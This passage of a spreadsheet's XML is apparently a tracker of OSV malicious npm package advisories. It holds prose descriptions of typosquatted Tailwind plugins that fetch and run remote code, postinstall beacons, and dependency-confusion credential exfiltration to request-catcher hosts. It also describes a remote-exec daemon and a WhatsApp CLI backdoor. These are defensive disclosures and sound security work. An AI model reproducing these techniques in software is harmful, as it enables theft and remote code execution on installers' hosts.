</t></is></c><c r="S157" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16048</t></is></c></row><row r="158"><c r="A158" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B158" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C158" s="5" t="inlineStr"><is><t>MAL-2026-16049</t></is></c><c r="D158" s="5" t="inlineStr" /><c r="E158" s="5" t="inlineStr" /><c r="F158" s="5" t="inlineStr" /><c r="G158" s="5" t="inlineStr" /><c r="H158" s="5" t="inlineStr" /><c r="I158" s="5" t="inlineStr" /><c r="J158" s="5" t="inlineStr" /><c r="K158" s="5" t="inlineStr" /><c r="L158" s="5" t="inlineStr"><is><t>npm:tailwindcss-aspectratio-styles</t></is></c><c r="M158" s="5" t="inlineStr" /><c r="N158" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O158" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P158" s="5" t="inlineStr" /><c r="Q158" s="5" t="inlineStr" /><c r="R158" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9b995eb02f80f9037beda9f8a864f55109e054925175289df0c1b29ed8011bc3)
src/index.js, referenced by the package main and executed on require(), performs an HTTP GET to http://tailwindlan.online, writes the response body to a sibling file, and immediately require()s that file, giving the operator of tailwindlan.online arbitrary code execution in the installer's Node.js process at import time. The fetch uses plain HTTP with no integrity or signature check, and the domain is unrelated to the tailwindlabs project. The package name resembles the official @tailwindcss/aspect-ratio plugin, and package.json's repository field points at tailwindlabs/tailwindcss-aspect-ratio to mimic the upstream; the legitimate plugin code is preserved verbatim with the remote-fetch-and-execute block appended to the end of the single minified line.
</t></is></c><c r="S158" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16049</t></is></c></row><row r="159"><c r="A159" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B159" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C159" s="5" t="inlineStr"><is><t>MAL-2026-16050</t></is></c><c r="D159" s="5" t="inlineStr" /><c r="E159" s="5" t="inlineStr" /><c r="F159" s="5" t="inlineStr" /><c r="G159" s="5" t="inlineStr" /><c r="H159" s="5" t="inlineStr" /><c r="I159" s="5" t="inlineStr" /><c r="J159" s="5" t="inlineStr" /><c r="K159" s="5" t="inlineStr" /><c r="L159" s="5" t="inlineStr"><is><t>npm:@aspect-adv-ui/consent-manager</t></is></c><c r="M159" s="5" t="inlineStr" /><c r="N159" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O159" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P159" s="5" t="inlineStr" /><c r="Q159" s="5" t="inlineStr" /><c r="R159" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b30b507d6c71f746b0af2d19cbbb85357f15189e7e93118c75b4cb215adc0ece)
@aspect-adv-ui/consent-manager 2.4.1 declares a postinstall hook (`node setup.js`) that fires automatically on every `npm install`. setup.js issues an HTTPS GET to a hardcoded webhook.site inspection endpoint (https://webhook.site/kapper), sending install-event metadata (source IP, TLS/user-agent fingerprint) to an author-controlled third-party collector. The package is advertised as a small GDPR/CCPA consent-bar React component with no native build, no binary, and no legitimate install-time work; the postinstall exists solely to run this beacon. webhook.site is a public request-inspection service commonly used as an anonymous exfiltration/beacon endpoint, and the beacon is not disclosed or opt-in.
</t></is></c><c r="S159" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16050</t></is></c></row><row r="160"><c r="A160" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B160" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C160" s="5" t="inlineStr"><is><t>MAL-2026-16051</t></is></c><c r="D160" s="5" t="inlineStr" /><c r="E160" s="5" t="inlineStr" /><c r="F160" s="5" t="inlineStr" /><c r="G160" s="5" t="inlineStr" /><c r="H160" s="5" t="inlineStr" /><c r="I160" s="5" t="inlineStr" /><c r="J160" s="5" t="inlineStr" /><c r="K160" s="5" t="inlineStr" /><c r="L160" s="5" t="inlineStr"><is><t>npm:@umschool/analytics</t></is></c><c r="M160" s="5" t="inlineStr" /><c r="N160" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O160" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P160" s="5" t="inlineStr" /><c r="Q160" s="5" t="inlineStr" /><c r="R160" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (da14c2843514d3c9103335648bc81a8bce18fc173b27c2ab39ebe2c6c0abe028)
@umschool/analytics@999.0.4 targets the internal @umschool npm scope with an implausibly high version number to force resolution over any private package of the same name. Its postinstall.js runs on npm install and collects host identity (os.hostname, os.userInfo, process.cwd), reads /etc/hostname, /etc/hosts, /etc/resolv.conf, and /proc/version, filters process.env for credential-shaped keys matching a broad regex (token/secret/key/pass/aws/db/jwt/auth/etc.), and walks parent directories to read.env and config.* files. Each payload is base64-encoded and transmitted via three HTTPS GET beacons to akko.requestcatcher.com, with an additional hex-encoded DNS beacon of hostname+user to the same domain. A README/comment self-labeling the code as a 'HARMLESS PoC' does not change the observed behavior: credential-shaped environment variables, dotenv files, and internal network configuration leave the installer's build host to a third-party request-catcher.
</t></is></c><c r="S160" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16051</t></is></c></row><row r="161"><c r="A161" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B161" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C161" s="5" t="inlineStr"><is><t>MAL-2026-16052</t></is></c><c r="D161" s="5" t="inlineStr" /><c r="E161" s="5" t="inlineStr" /><c r="F161" s="5" t="inlineStr" /><c r="G161" s="5" t="inlineStr" /><c r="H161" s="5" t="inlineStr" /><c r="I161" s="5" t="inlineStr" /><c r="J161" s="5" t="inlineStr" /><c r="K161" s="5" t="inlineStr" /><c r="L161" s="5" t="inlineStr"><is><t>npm:open-item-validator</t></is></c><c r="M161" s="5" t="inlineStr" /><c r="N161" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O161" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P161" s="5" t="inlineStr" /><c r="Q161" s="5" t="inlineStr" /><c r="R161" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7ba5b55d57f4938bf2494d369d14434bb80ba6f6c712c7f8d89ae773c27dc457)
On require(), index.js spawns a detached, unref'd background Node process (lib/check-items.js) that repeatedly HTTP-GETs a JSON payload from http://itemx.servegame.com:8888/api/x-realtime and executes the returned JavaScript via new Function('require','module', payload.code)(require, moduleObj). The daemon survives the parent process and re-polls the endpoint on a configured interval, so whoever controls that endpoint runs arbitrary Node code on the installer's host on library load and continuously thereafter. The fetch is over plain HTTP to a No-IP dynamic-DNS host (servegame.com) that does not match the publisher's declared homepage (game.spawnrealm.com); a bundled RSA signature check does not alter that the endpoint operator chooses what code runs. README framing as 'signed game code updates' is inconsistent with the shipped generic fetch-and-exec mechanism and the publisher/destination host mismatch.
</t></is></c><c r="S161" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16052</t></is></c></row><row r="162"><c r="A162" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B162" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C162" s="5" t="inlineStr"><is><t>MAL-2026-16056</t></is></c><c r="D162" s="5" t="inlineStr" /><c r="E162" s="5" t="inlineStr" /><c r="F162" s="5" t="inlineStr" /><c r="G162" s="5" t="inlineStr" /><c r="H162" s="5" t="inlineStr" /><c r="I162" s="5" t="inlineStr" /><c r="J162" s="5" t="inlineStr" /><c r="K162" s="5" t="inlineStr" /><c r="L162" s="5" t="inlineStr"><is><t>npm:tailwind-aspect-styles</t></is></c><c r="M162" s="5" t="inlineStr" /><c r="N162" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O162" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P162" s="5" t="inlineStr" /><c r="Q162" s="5" t="inlineStr" /><c r="R162" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4d63fe1e50dc7d704732a5e92e95f320fcc3fac45c5a0a223ed278f316c2bb14)
The package's main module (src/index.js) performs an https.get to http://23.27.245.100/index.js over plain HTTP, writes the response to./inout.js in the consumer's working directory, and immediately require()s the written file. The fetch is unpinned, unauthenticated, and served from a bare IP over cleartext, so the operator of that endpoint controls arbitrary JavaScript executed in the Node process that loads this package. The package presents itself as the Tailwind aspect-ratio plugin, with a package.json repository field pointing to tailwindlabs/tailwindcss-aspect-ratio, while the dropper is appended after the legitimate-looking plugin export.
</t></is></c><c r="S162" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16056</t></is></c></row><row r="163"><c r="A163" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B163" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C163" s="5" t="inlineStr"><is><t>MAL-2026-16057</t></is></c><c r="D163" s="5" t="inlineStr" /><c r="E163" s="5" t="inlineStr" /><c r="F163" s="5" t="inlineStr" /><c r="G163" s="5" t="inlineStr" /><c r="H163" s="5" t="inlineStr" /><c r="I163" s="5" t="inlineStr" /><c r="J163" s="5" t="inlineStr" /><c r="K163" s="5" t="inlineStr" /><c r="L163" s="5" t="inlineStr"><is><t>npm:toru-ultimate</t></is></c><c r="M163" s="5" t="inlineStr" /><c r="N163" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O163" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P163" s="5" t="inlineStr" /><c r="Q163" s="5" t="inlineStr" /><c r="R163" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e6ef8cb6f3ca866b67fa91f2e770c674ddb7d6b110fd671ba98669dc1220510f)
The package's loginViaAPI() function POSTs caller-supplied Facebook email, password, and 2FA Base32 secret to https://minhdong.site/api/v1/facebook/login_ios (a domain unrelated to Facebook, tied to the package's contributor). The response returns Facebook cookies/access_token which are then installed into the caller's session. The README documents login via appState cookies and does not disclose that email/password logins are proxied through minhdong.site. Additionally, package.json declares 'fca-unofficial' as 'github:VangBanLaNhat/fca-unofficial' — an unpinned mutable GitHub reference with no commit SHA. npm install fetches whatever bytes the branch HEAD returns, with no integrity check, and this module is require'd by the bundled E2EE client, so its code runs at import. Whoever controls that GitHub branch controls code delivered to every installer.
</t></is></c><c r="S163" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16057</t></is></c></row><row r="164"><c r="A164" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B164" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C164" s="5" t="inlineStr"><is><t>MAL-2026-16058</t></is></c><c r="D164" s="5" t="inlineStr" /><c r="E164" s="5" t="inlineStr" /><c r="F164" s="5" t="inlineStr" /><c r="G164" s="5" t="inlineStr" /><c r="H164" s="5" t="inlineStr" /><c r="I164" s="5" t="inlineStr" /><c r="J164" s="5" t="inlineStr" /><c r="K164" s="5" t="inlineStr" /><c r="L164" s="5" t="inlineStr"><is><t>npm:vinzz-wcli</t></is></c><c r="M164" s="5" t="inlineStr" /><c r="N164" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O164" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P164" s="5" t="inlineStr" /><c r="Q164" s="5" t="inlineStr" /><c r="R164" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (8dec0212466f7170f1e00ecbfe3f846cbf5d211917c3831a6ee162ca6d44ec10)
vinzz-wcli is a WhatsApp CLI whose main entry (index.js) sets `global.ownerr = "6285185667890@s.whatsapp.net"` and treats any incoming WhatsApp message from that JID as coming from an authorized owner. The `messages.upsert` handler routes messages from owners into `handleCommand`, which dispatches to plugins including `cmd` (which calls `child_process.exec` on the message text) and `eval` (which builds and runs an `AsyncFunction` from the message text). When an installer runs the CLI and pairs their own WhatsApp account, the hardcoded third-party number is silently added as an owner and can send arbitrary shell commands and JavaScript to be executed on the installer's host with the installer's privileges. The tarball also ships a second file, index2.js, which is not the declared main but contains the same hardcoded owner JID and the same messages.upsert -&gt; handleCommand dispatch, providing an equivalent execution path if that file is invoked directly.
</t></is></c><c r="S164" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16058</t></is></c></row><row r="165"><c r="A165" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B165" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C165" s="5" t="inlineStr"><is><t>MAL-2026-16199</t></is></c><c r="D165" s="5" t="inlineStr" /><c r="E165" s="5" t="inlineStr" /><c r="F165" s="5" t="inlineStr" /><c r="G165" s="5" t="inlineStr" /><c r="H165" s="5" t="inlineStr" /><c r="I165" s="5" t="inlineStr" /><c r="J165" s="5" t="inlineStr" /><c r="K165" s="5" t="inlineStr" /><c r="L165" s="5" t="inlineStr"><is><t>npm:plogme</t></is></c><c r="M165" s="5" t="inlineStr" /><c r="N165" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O165" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P165" s="5" t="inlineStr" /><c r="Q165" s="5" t="inlineStr" /><c r="R165" s="5" t="inlineStr"><is><t>plogme is a renamed fork of the Baileys WhatsApp Web library from the same publisher-controlled family as @crysnovax/baileys (MAL-2026-15917), and versions 1.0.0 through 1.0.3 carry the same forced-follow and fingerprint modules. lib/Utils/channel-policy.js (javascript-obfuscator output, identical to the file in MAL-2026-15917) hardcodes the publisher's WhatsApp newsletter channels 120363423670814885@newsletter and 120363402922206865@newsletter and exports followCrysnovaxTrustedChannels(); lib/Socket/socket.js invokes it from the connection.update handler, so the user's own authenticated WhatsApp account silently follows both channels on every successful connection, with no opt-out. lib/Utils/integrity.js hashes hostname, platform, arch, cpu model and Node version into a machine fingerprint and POSTs it with the package identity to https://bailey.crysnovax.link/api/v1/verify on every socket connect. The obfuscated follow module was decoded, not executed.</t></is></c><c r="S165" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16199</t></is></c></row></sheetData><autoFilter ref="A1:S165" /><conditionalFormatting sqref="E2:E165"><cfRule type="cellIs" priority="1" operator="equal" dxfId="0"><formula>"CRITICAL"</formula></cfRule><cfRule type="cellIs" priority="2" operator="equal" dxfId="1"><formula>"HIGH"</formula></cfRule><cfRule type="cellIs" priority="3" operator="equal" dxfId="2"><formula>"MEDIUM"</formula></cfRule><cfRule type="cellIs" priority="4" operator="equal" dxfId="3"><formula>"LOW"</formula></cfRule></conditionalFormatting><conditionalFormatting sqref="G2:G165"><cfRule type="cellIs" priority="5" operator="equal" dxfId="4"><formula>"Yes"</formula></cfRule></conditionalFormatting><hyperlinks><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s><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2026-09-17T09:49:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-17T09:49:14Z</dcterms:modified>
</cp:coreProperties>
</file>